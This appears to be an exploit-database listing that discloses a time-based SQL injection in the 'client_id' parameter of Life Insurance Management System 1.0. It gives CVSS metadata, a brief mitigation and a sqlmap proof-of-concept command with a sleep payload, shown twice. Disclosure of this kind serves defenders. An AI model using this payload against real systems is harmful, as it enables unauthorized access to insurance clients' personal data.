header-logo
Suggest Exploit
vendor:
Life Insurance Management System
by:
Aitor Herrero
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Life Insurance Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:life_insurance_management_system
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows, Linux
2021

Life Insurance Management System 1.0 – ‘client_id’ SQL Injection

Login in the application and go to clientStatus.php?client_id= and use sqlmap -u http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1 to exploit the vulnerability.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Life Insurance Management System 1.0 - 'client_id' SQL Injection
# Date: 15/1/2021
# Exploit Author: Aitor Herrero
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html
# Version: 1.0
# Tested on: Windows /linux /

Login in the application

Go to clientStatus.php?client_id=

sqlmap -u "http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1
<http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129%27%20and%20sleep(20)%20and%20%271%27=%271>"

Navigation

Suggest Exploit

Services By CQR